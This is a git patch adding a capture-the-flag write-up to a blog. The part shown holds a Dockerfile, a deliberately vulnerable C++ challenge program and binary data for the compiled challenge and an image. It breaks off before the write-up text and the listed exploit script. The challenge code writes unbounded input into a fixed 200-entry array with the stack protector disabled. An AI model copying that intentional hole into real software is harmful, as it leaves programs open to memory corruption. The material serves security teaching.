From 08e95ef242e4def297678e2d20cfbb93c85c9d00 Mon Sep 17 00:00:00 2001 From: falamous Date: Thu, 31 Oct 2024 21:14:37 +0300 Subject: [PATCH 1/2] posts/ctfcup2024-olymp add writeup --- content/blog/ctfcup2024-olymp/Dockerfile | 11 ++ content/blog/ctfcup2024-olymp/a.cc | 70 ++++++++ content/blog/ctfcup2024-olymp/a.out | Bin 0 -> 17680 bytes .../blog/ctfcup2024-olymp/compare_memcmp.png | Bin 0 -> 28381 bytes content/blog/ctfcup2024-olymp/entrypoint.sh | 7 + content/blog/ctfcup2024-olymp/index.md | 81 ++++++++++ content/blog/ctfcup2024-olymp/sploit.py | 150 ++++++++++++++++++ 7 files changed, 319 insertions(+) create mode 100644 content/blog/ctfcup2024-olymp/Dockerfile create mode 100644 content/blog/ctfcup2024-olymp/a.cc create mode 100755 content/blog/ctfcup2024-olymp/a.out create mode 100644 content/blog/ctfcup2024-olymp/compare_memcmp.png create mode 100644 content/blog/ctfcup2024-olymp/entrypoint.sh create mode 100644 content/blog/ctfcup2024-olymp/index.md create mode 100644 content/blog/ctfcup2024-olymp/sploit.py diff --git a/content/blog/ctfcup2024-olymp/Dockerfile b/content/blog/ctfcup2024-olymp/Dockerfile new file mode 100644 index 0000000..681d902 --- /dev/null +++ b/content/blog/ctfcup2024-olymp/Dockerfile @@ -0,0 +1,11 @@ +FROM ubuntu@sha256:8a37d68f4f73ebf3d4efafbcf66379bf3728902a8038616808f04e34a9ab63ee + +RUN apt update +RUN apt install -y socat + +COPY entrypoint.sh / +RUN chmod +x /entrypoint.sh +COPY a.out / +RUN chmod +x /a.out + +CMD ["/entrypoint.sh"] diff --git a/content/blog/ctfcup2024-olymp/a.cc b/content/blog/ctfcup2024-olymp/a.cc new file mode 100644 index 0000000..791eba6 --- /dev/null +++ b/content/blog/ctfcup2024-olymp/a.cc @@ -0,0 +1,70 @@ +#pragma GCC optimize( \ + "O3,Ofast,no-stack-protector,rename-registers,unroll-all-loops,inline-functions,sched-spec") +#include +#include +#include +/*#include */ + +#define MAX_LENGTH 200 + +using namespace std; + +uint64_t prefix[MAX_LENGTH]; + +string s; + +void build_prefix_hashes() { + uint64_t h = 0; + prefix[0] = h; + for (int i = 0; i < s.size(); i++) { + h = h * 31337 + s[i]; + prefix[i + 1] = h; + } +} + +uint64_t pow64(uint64_t base, uint64_t exp) { + uint64_t res = 1; + while (exp != 0) { + if (exp % 2 == 1) { + res = res * base; + } + base = base * base; + exp /= 2; + } + return res; +} + +void test_case() { + cin >> s; + build_prefix_hashes(); + int q; + cin >> q; + for (int i = 0; i < q; i++) { + int la, ra; + int lb, rb; + cin >> la; + cin >> ra; + cin >> lb; + cin >> rb; + ra += 1; + rb += 1; + int ha = prefix[la] - prefix[ra] * pow64(31337, ra - la); + int hb = prefix[la] - prefix[ra] * pow64(31337, rb - lb); + if (ha == hb && s.substr(la, ra - la) == s.substr(rb, rb - lb)) { + puts("YES"); + } else { + puts("NO"); + } + } +} + +int main() { + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + int q; + cin >> q; + + for (int i = 0; i < q; i++) { + test_case(); + } +} diff --git a/content/blog/ctfcup2024-olymp/a.out b/content/blog/ctfcup2024-olymp/a.out new file mode 100755 index 0000000000000000000000000000000000000000..f21a4a7a814127ceb317a8ac1b39faa11341e41c GIT binary patch literal 17680 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 IPDLpDU*GFT+5i9m literal 0 HcmV?d00001 diff --git a/content/blog/ctfcup2024-olymp/compare_memcmp.png b/content/blog/ctfcup2024-olymp/compare_memcmp.png new file mode 100644 index 0000000000000000000000000000000000000000..c6d0c19cae2e29beb6ffd9520d1a2cd723e50947 GIT binary patch literal 28381 zcmaI;WmsEHw*U;&0tE^bw_*)iij`u8BE^drcW-fbPYc0{yF+nzch}(V?h@Qd^5uTc zbD#6QKi+p=S0;NVGizqAy?m`JA>S3GuwTD@jf8}RE&WYg83_sX1LA%Q{UxI9m$yws zd|}vs({e&WA`1TJ^P+eD>t7_KcSzFWBC76bC#!CTgncli^W@bweaE3ZH)V|9ApFBN zt?zg*M40>tUtmgn6;UNz_8KPmlKmG(XnpUkn0MbP8v9n}9o>s5FGtq-We5!R89mWA zab@@0y)Voihu5j5re-~TbuoFhj~0^rdx>Uq!Of?sEj!zIJVQ`4t8$S`GUuZG34)1@ z?X!`k#YJz+sfe_4vvA#_tfCSxLob4hBEt2^-18Bu2R)$M&(Dui_{5E4eCbaN&$KuS z*!LNhO2DXK7$#;y!0fWOV>ndTy7Gw9)zuXrA5Xe1;{R%u+oHPP(8VVQ$-YlfAb$O1 zXm3h)q$@_mjr>YsLXuK6m{0~Z$ylh<6 z3Wq(>)6e6Og)^25hMOqXq{ae7vohHRLLA| zhnFK$6qsnEnIG#E9V;FKrl~zCW?V8lfhxartLYQiq@E_1v?)8zU2>^aiR^q&X1 z0T;-p5>ryzRB5(W&neViS4lzAopHd`=zx;h$9;pKwe?#d<%kO1#@Rx1UVi><5jVTD zqq^>!n>C#ZNeKz6XK19G(9&dA-4j(%Hw6osfVA%!&0&;RiL0$RdcfGyAV%2Nq>1ze z|M$afSbDb4ltPaOv~}8oZV=r8;1pMz$JO58;NWIY(7GH}xbXSQOm3J$6A>Yy0Q~u? zsfoA3TUl9|$7YF;ni|N-fxsmfwf;k4*iy4r$Qku2_0?Thz}?u$$Vi$n(6@#uR8|JY zpT562i@ectPtEgVq6bHK#n}Uvcor{6T6J?zt;7h^bUz#U>hVtW)Z&4u!FNadF2^gw zZ>~Z!iIh5sL%oRG?9;eBg>e6*tPyE`W9~@~vp zX*6D@?aJD5K6>Z&4g~Us2QE-bt*YjyI2OCI<xcbJgBI7*x_N!@(2!QW^&(`o#g2k- zl@*pw+u^Up>h6BI@f(@Atd;C&dEF=e9r}R2ldinl{ESe;Vfvf$LY+&c^BQyjh=YSB zztYeUY5!S1RyoeAEdO}Juk{8I)82a{hE^hl$#$V45^t8+inQ>Ir|}= zpZ|k$=l0vtxj2w!*7qn6w&Rhe(D-<6%F^-#^`&q%4Gk#?35!Y&$c7m~v3d^nYNgSkJF92*z6Q>OMPYGm>Ab~kOaCveQe{Bj13+MbJ7 zLZZ*EwQe^)aV{VbRLNq+^>*FktcM_(#K6;5V*R>yAX7JQ^2p74)tHNvM7XV9N_8PW zd>s7zT&ivb_0FPFG9u>{K!^i8QSGwZQ6LNxP-_I$eiLNE^>+I4dhhCCzowczZ;~ub zzUDPf0xzp{P8q47BdK&ulZVHUw6q0Nh*>qiC+eYB(%(^+c%3;=*~$pUYccdiOJ?SV zQX_QQEv}5XS%!HWf`p&Ec5AKno1**eyrP8$9lj0@4lQnH<(YnKtmMGket6Z%D7Lee zY@6rn&px-_*3PQNqG?VS&CCYeFr5Zlm+Q9ett}cFnvea6g{Y{g+}zxVVZ9pDaE*Bg z^H}uyYpTQ)E?Z4;ck{gmS)dt@FyDixg2IEq?e#0r#H9pI!JV`Z^c3Q~Kd8e0^ z-`|Jd%o~i!K0iMn!Nd9JyzI7$jN=~)(oZ#8mhVb*kA0oNIZ-x`IA7$?9uIkwGp{3F zKyi(O-pDaZUk=Yc_ktSl4=P)`KS}X_kvC{e60{u|d|@#prSKD*T;SKwMcM(ybwMLl z?X#IxFF5)+fpCkr!#8_ea5Y2hVUHr5{mJq|%C1dQU;iQUuA!sew`s(n{gDT?L|J*(<7!=ja50vN423D-jeS(=zArFp}jQ8nd|);`r}R7_gx)p znze>&i=}3%qnjZEB*7Bd8teCF%A(I=(*^v*LQOxizl_(7R+*w7B9wpj)oB0KU$}vpC-#kxp@_C#bM6c#Ng`=P_ zkYfoMGNDZpX5%?JL7I+(q}A2cfBxK^DN?}`{SbdNlFVsb^_iB|AH2(E(C*#khdN!L z*l~et-C+Gpxe(~qxM;e33bfH?-oWH(e}Md|jkCa6b2~YUUG8|O&`^A_{=5%VWKB9$ z?Y0F6g~N+f3Mk+RnH(jP$0g55PmjeH|2WxkdiL1JX``D;Z?-c%YT)9fk2q2SGTpg*!Q>+W|dp|g-Uwa}9LA6Na^F;l#2 zt5kRt=TlD1&ir~`e|0QcZ`!~2@46p%6Xwt=mB)#F>c>g-KGTc1EojVj-qxY^YU1(k zY0wZVP2YP~f8V6~#co=MCb}?BRbTsw^8-A97$;-yz zKaZM)+BR06mL0>h$+o^K*`*&$GU32)GKJfO9#>uOa#GiR+3_EAt=+rX>ccw2V00qa zvS%irlHs4P-ISHPg8^hssJvd?QVMC5f{yo5Umnf$2W5lLvgT%p64bu95`(h?Y6>2t z>Fumxm6fGOH~Sg_kAt-?scTB_;{aVEc!1w97>wc#ccop$POp3F=#g$4;o_1^3$x$5 z!obKT$0psD)d*XPAcS_L{uH{#Z|^ZarNqg&uF_#YnJr;qVX>zDbDu`~G9)jO6H7%y zv$oFR45bPeKk%4`q=N;mNDIZ)sKgV_c~z9T3taz z>Cop+zoO*){9HR=>r7=IPqdGoUP(zw_sxJgSAzOVD{zr3T$RQqMXiSZVV<1a#KZ(w z6g40q)BDlm`*%ZI+qL8?5_txdv$Z0c7wd+fys9Als7$vwK0jy~-;b!Pgy3$W1O>3U zw^`0hHY=Rks+UtU5Qj?8;p3q=JYFBFm8jq7dSyc7$ZCFq>ur`P7)1k(zQvrBhYO1a z(+%Z?Qk8Y=T32c6ST+blw^G#<*|h7d+vWB&bV}|m@2I5G-46-v^;-IOT4)e5b9Z+) z0!YE;b34uginX7si*U5aN>o$`mCbI*KQdw%d#csgEmH*wCq#ZCl!JdC;> zOC7y@?$r@`KDn%$deKIZ$dbnSv2A`+MQgsslH2(T^Uv0{F*I*0%k4VveRXxSBpc4c z4OCI%QdVET!+30j2}_<=P);(Ow0QPt&e}V5U{gE*%>}HtF)`FNJ{Rem`2lB$W3=Ng zt3wVLBA&h4;?{G}AeQ6%qW|7`@4>G-rl}@BFpOYY$>nO!{a$<3)Y;Ia8(bA)dQI+P$IZiX5&k*|F%P_ItnXia|ayJVFGU zT$-fm^P>-ExYcT;E!n%#H!PJmaB{K_IC0>sa{abA4Z}|<$|^A)y2HkGd{gmi2;Dur zkW?tdSa$NwQ_e7{1k3We_x{}r+{{zE`tPY~AIm}rIR+C}3r(kLoY z-0vmd+b>V5lMdd4z8fhGk+irrR8K+vjPHNRc>MS_937DLeW3#gFD+%MX=-=cEkjS^ z{%AYb`5813O)Hg_m?;cg`^UhGFzYzZ>=JU=>lWOW3a94vT&M*2Jmqt+=;-OSIrlk@ zZI58}e9kX&c>l-z{QlwwXtEy=ekbP?$;?}G_ttFIS~^3wEep1;$eID(wD-JIfO-z7 zhgE(3dUqJV;Oyr~((|bs)Rp!Z-AYYscX|9Bs9W7`FHrI|!K>r36A@eCWr*cAaDdV+ zimnL=hq3C^AKW|+2jyg|h(*9Fe;&`3@ub@9jU+25BD;e7sVBLhLlG573m*!nft=QYW#Qdi9gQTM9gESo9QU^v}gje>D5gs+Kb2kvtt?9QkA-#&Y+0 z%<}~^OQ$1En28J#)PfEt-x7Y}P=7g11Awc!x$BO3+P0r}ZUaL3XoIj3)K;!qY-vfv z#3YR(k_K+Rp2hJxo*v0?bz^2eE#Gl$`u=|A_$DHm(H{+mIJEDk;;Z;zDBk^U$n*T2 z-lNaM0vba^kwK&NVl@o<YBYyo_kocY4wdJRB_BqGbej~(l4+jN;>N;83+bcK(cSOR$Nb})$AN^> zk4YnLk>u^xLt9ljQm+1xhTHS;(k^2GVBBUho~YVc8PP3eIrteHbH(Q@g}gzZqu*-2 zT(8OTr@Z_qrQKM& zc#(B6c#VcDn!4t#!Gd4v?T9CWKPu2X?<~R6Y|m#ZVrPx+d4)nj+Xds{)L%XcvDK?*v6L5pm3&-ULUN}N=m}1PG@>X$rKKAwXsh8Bj!Z8aJ z(qCg>6qS~i0$=u$;|*3@BV3mA+#Q4c+j>jO4(RRjqp(rf)#c^Om%7k3N0LvzCrKVo zW;HC}>XXB1vwC3DaUQnS{%E?O9mG1&h)s7;)O?)X3rPOSePSyha?zS+01bdEn(2Mp zCrh5813$4WnYC=;_zK;eJ7pJypDdZFzXLh*L!~mk)s@r;D2eLqyIKP<_q599nCD-o z8s(A_;v+skmUa`@dDcmh?(UiXIy^LcK%f3z zRE!@ZUag?}`QPml69lPKesL`w`XP#bbFx?iQ}JGHfZ5qGio)r}Mq^h#o#J19gC z5Y?`Z$gk+_N{MacJP z1R4v;ws?%}85oG9l2Q60<4BPR#&{h^LP)%9U7sH`lw^cl&1S&oefeBW@8re6=sK;p z5z9=SUK6pC?4JnY#&XVjm-sUJHF_ygW2TTU z==7ndT8pIS4(8CRV5V9$o3*mBZN_Hq@+x*QjH5lqKt0nea`3yyFW@orse)!g-J&%* z!0#PJP}=rN=SMjx-Zxy7<8;}-LOzca{Lb%%;o7o4kEaVF_ve?Igx0E#w<%lF5?Qn^ zbaS{Og;($OtOD}lamEdn%r|Gds~0gdtWzA?O_YLR^>1#s`xMTXmq2nkH2w6MPF61WaH&~cU?(G>> zd)^#nXJ;d9hliz}#K`>^I=-L7amU+Kr=vBY7M~wity=`W_Ebar9)}|A&JGg!ud@WbxnrHc7GDm`Da>oKkr>e6}8EM1M;x6oHmNNvrJ2(E- zmBKx2Ix15pui3H8@NP|vZLg@@=E;OnR7k4VPUs|c>OhX?@z(0y@4GgsLYi+gBYGMj zTv06lVT)_7?S4Wm_}@yN>CbP0`}A5`S_pN5P{gqe@~>aNc7zdd!8&DIC+}ObEuNX< zhyNQHF5Z3$zIg}x!q#TCa`_YU4tlnM(*e8aeGYncEo*S|Z1pyMa(?%c-T<{Dsup^G zsxc%J*PB7qV;O?W9z!$9 zPGPkrt0-s!Kc3@w2prG@#TxmGjjO9!x?DWh5oeF{+hJw>|f_a2Gc-?v0a92>Z-F zYGh4s#cnW0r%Q2@%5Et2{(||W%6lKpSd^uoExvRn#~q^FiM>x$-usPwW`3)fY&NcQ zf}L?)v%qn>S72~qNYcEHUjuU- z@1F$5f38la_r$NhA|Y+uB8LnAGxC)&N0ocGolR_c>($zRPhDdAGNMJUph*SBBO|S5 z>g$~z)BI=YioW3`-+%59&4$Ya^wqze);EZg{P+4b?=l48O-SMqRCxfaECF&WLJ^xI zB9Zonos0(gnajj{zmJczktRaW9poZ^yXEzRH|5`^ztSeRXZF9pCMxuZ?CSnoi_zva z5cuinu2 zf3{KI+E)Py48&80vh=A%mX$S6jQF|N1e6ft5#R*M@Rn^_P?8bq7VFO5_x z)6{pEfgD#mqvj?N&~;J>@kaSilvQCaquze8M?ReAtWu0g;+ofbr^~PSMJH7U!h+n) z7_4Y;$TkmXKDwI8^zVh1@WDk_Qq z>UyT1W6QuJb3aYVhev~H^PW?2bmmn&6`!myoQjYDo9sEZ@gI9ZE0H_WpVRe&PPa?$ zTSMlS<4x!C>zHiHaxZ=OmM8jdzns&v{0TjarDJfeTMVj5n02}E>TGzfI_#~R%jbwp z|M}5u#|I!AczI7bGLZc1uG8-xdD&|u&g0`W1Z8XbCQN`V^Y;*}M57Pxrjt2xHl+xR zzJxZPCrdX#c%7CsuF}Cl(Q+*}UYujGV4o(_Q?^|0W7m2BY7+##lk4G29Ik;4$ea zmpBLA|KMbTr=zlhUG9a1lp&fMhOU46SD>izWYg_fwPA}$6#Rbkh}TQ*qj~#d`{T0p zml4zUcn49hfN#>WyUAOYIThfS{6u91*eu3!&Xm)xTXROh$t_f+NbEh#vN=a0BEXIK zL+9zJ)5TEAXjrp&+ta$50Y!tk76><*pU?H!`f#MEy23z%SwKm9LTh0Q>@v`O!+1CA z4IHu+LkDET!y0i4WJv_x!!D40F!h*9ZkHB693o5){Vt*)<{PS(?4unB?;hy(3Wsod ziFw$Mg69%q*hDVO;E#PaHs9|QWfGS%7ordS>e-s?g?Dma#0?gY*)_mm7Ox+oy>VmI z5_>2tPjEYDKh$^-*YF^2BqLR!GcF6Oszd6WJcQwdCt%AFiVraXx{kQ_!25AJZXY;Z z!d3clu=PC~tiNK7XGU6t>M5Cwfu~_-ZnN#)&Coh=2g!BnPhO3+8l+O0K%+)Y;Fb<|UEhFfhc5LP55?Xj4WoLjbySHYZI5RveD~sdoyr%J#9T7}T z*l6u}-l+NK$B718O}HJ~`r{KNZ4DV}!7ITQj*V!{Ka}fp&+g&2$IkmLIbxlu&cO3p zKuoUTAG?AQ=IbEeidElFO6SKb}aoJyGUB)V(M9OF~*D2c*{dg$M=Ph4xn6%-D-kOeP) zYAS|9vhMirVfp>ed+wtH@VPyml({^v_n(5R)e?zR8ypgQV{bxmX{fzd#~uya&1N3COzSD@9TKn1U7Cawum=B^NInNN5|Dm z1~0`MYB$;Z-eBd=N3{Bx8>g0_M(wL4&mUsLPKR`p&h_lz50Qjx59ReD>@zol2#uO^ik5IP)hDWFJV><}o?1+n2Bpufv&Dr#Z)yGm6;X%bz|moVR7`mlnjIx1^-3wRw31l(#cu-aM%a4>UedbP3Yk7P{R$%aHx{RgCOLKvvL zvTm!VFW&O8nLgnsQ%rL2=F3XbU2LNSgbwt|^oQY$xU;%#qe^AmkL|X>`23uZUBUCLLe(*Si47uh0Y?8{NmAT)26sn)MadFC|$o zw*7_Ha5Dg1rs0R$fSyFmGaoL1poEnb-%2;_z4B|5Kjh>xhBMkhxuiVxU#zKIKGJlkmGj=tphjn02R~4#N_w2zM}V*YPw8mA#Qk+?di`~|68Y_=^W zW!R#p{NUO@q;2mVroZmZbR8-BPU=@JSsrVa^cNfA@oEYjcSVu;duX(`H$VR!tx{tf zU`&O|9zMRjJ=PeMJ>v+oHO?b;F@5Lr-yDyQPbRmiVdFRW`bS}eAbva>)iK<^)6}PrUtSyP=`?c z>Z+G)-^lQ*V1R^gLR!k*ML-uU*;v#^og75q#rX80shN}CuT#~!`d#Ob_V3nC;)Jp~ zSE|@ka~T@GHHrq_x^3|4)5kWQH*RxFy=G6ZMo-Gzt6=u@jj@c6Ll)Bw6$V~{$B#eX z6FW*pU^OxlQ8Krag{TEI%kc$?Yf`cP!J7@tfV9MQ7-o>Pzp=kFt zAPl;@HQ*9#tO&3A+}BXDd(CP$gWr|f@t#FY&J6awaSu(5)gPC^Q$E<+%l9iyND3wB z`h=mWJrY+mm{z+{mtpz?Z=3pq*o#q`m2JpE1<5zYa1tN;-Mtp+)a_=yP9 z)08bd13#b~re6z_l`nq*0Nr=R&?`y`C*VEwV@;2w=RY2kev;!UZoMsvCt~dVZO}%| zciz5Hy?#Z#QoO%P(6G-Tok{q5f9Z%b-xzvUJneI9c@eaK>I#aAf)7?xS-nClOU)B} zsA`A#4PbIBMgUn%6<#Vi=DMF29DyUaFFaI8?lgrzT?ddgTV#@_vrqGV;-g-kk&!5A z>19Ufm~QV2l@gRm{@wg}oe0H>v~69r3$xQq6}s3!)U~U!O<@Jvk7*f~X!sZ^3a90d zwn<->A;wnQ4>edKH(}f0m*?p?ec>(3?gxL1$GVR+*IF3~^05hm?D34X7y`ursX2wV zwV5vcf>dv>oT+;mdkdE5GyQ%nZoIP|{$%R)wE5nx97VUxqn84fe^7b#k_|Y7i2=n^ zaj$eAtspL7M!OqBFF%*0%W*xE4@1uBMzP&Zp<0IK#3U&19OdKYaN9<;`> zL@z9`_gd6Ayo8{=NyT%gA5~VO{+(NPQ>HNM*FgsqeZK7m2$pDY^7FURnD-Ef-A^>z zQ8R3^WyMTF7zlT3NN54?OR0F(BfW$g=8LZyb2f`>_R*t{nFRer&|D=vlwvp*Nq(*< zNNx{PLF`BAq^CJ>HtQ9q%>t%yqQEVuXmHw-;~96zBfA0XV^x3!qb5TtcUq9z@ceqY zP-#c9SRef?IPopDW_iMNL+f{0RpU-U2hgG81LiupC1rB;$Syp-ofNPlRMh7-rW%*( z;u<|@%UW!#Eqtw`csM5{if+Wlt6HKBms!j>b{k#j7E1|rdVYm^)%(o=j@)p^0PuEy zW5K7=YFLw>E2j5>*K)0_&Wm4Ym8qaaDX0<8mw7KpUVa~wL&c$L4@_;@-m&t0HKk|Y z!RaAYl1Qy`{g$lOS!QFPI=?w<#8I!HY+n3inRCibjkx$BSaQJlcfE5+mAQe^bPnqI5U}3v1wU{Y5Qb$%L z7C}w1kt-Gg?pKzf8=;_J?j)?TQwh6SMp015N9jp*Z_lh7SAS{v4d5yr=UzUu6S})T zNB-pBdX@2u)OxwYK+iEp4r1HFyyTW(fo-x1yN!?e9dnIhG_EPq-xjU>rki6kRDN#D zd-U+-cAfx~x*+^!wUW)jH|QR8-#S!x--~~dBJrD}^x-L!`}O#BxAxv;{8uS;hqG#` z$bzV1%%3Gf(|mT(sb(k|?u;=ADI*P2v14F`h!}?9f_JD{ylo@v${0epk8iNv>|rvg z?k7vVX|}l|uj*~0jma6Sp*6S8!ehWiqjk0lEAvDZ!ER^#0ef#zVP76+9RA8nK43HZ zx9mG{hx1YSg3$psEi<|E^~L~RzIn~;N~W3mVoO=q@(UR+yVLWSJ|^$_$HK>PhWUY0 zc7#!$mGI-j58bcLTR~^;d~Nr^#D(7NN-PzQ=ViJ-oApI+s69Lma!L!rmCby1>(k#S zV|MK~mJ06G-A~_vtkJzM(t|$NzqxH&2FKSueH79Q=NGvC9lQu_T(EuEuJPkWV<}5} z-E!n>b_fnC&fw1`?f3}03GutG!UMnN!o1_V13DLD|5oX*&Up7hC7ljCvaYECSA# z7g%K^vdC-!Bw2j+B$RT5A1?3`(4QnX{U3OxkeUAYYn81oEjetIJ&Kq26_9A#xm7Mc zS&grd3EEq4{4)5Uu!v9*SXaP8;UKn(C6A*$*XFiUHuHI{d~BXPi!-5VeT49T91DB8 ze}PA>mb)C$5?XY(V8lEc@pr+Gw0U*i?4E-tm#oJ#WffUoN4h@w%9xl{Us_{*wi zs|tM>spgxi5Lyzws`f&&#*E$UbTQTXuxbhFVjI8ezogv~xjo%iXaa{RJ}AH|(WW0v zNEjeTDm75FzV@lT3XJ9x-+}1E%f4y9GwIDs>$%dLS!&9gt;S?<9SE6@u4_u>=k$^( z^Q`MDCuo|%#>mvz^sJ`8-t1*Oc}@dUik#v1xkWO$;NuFv*6&xKU_wA|JSG~~osjBW z#NeKg%9JO_y+lYaOp(2I&DMx0#ZDpc&0EUz!HpvoDRYqhddth{rt4&6nSu+_hK5z5 zH39I(!i7>QHKE!W(_^00^(CV*GdC)=o`vQ;o8y02*O^wR>G`2#J0TZ$SL%-jgv--o z|Fb)$k)2FunpwXh1Am1`O|<7g!Or;h_QBQeP4^3CB+^G 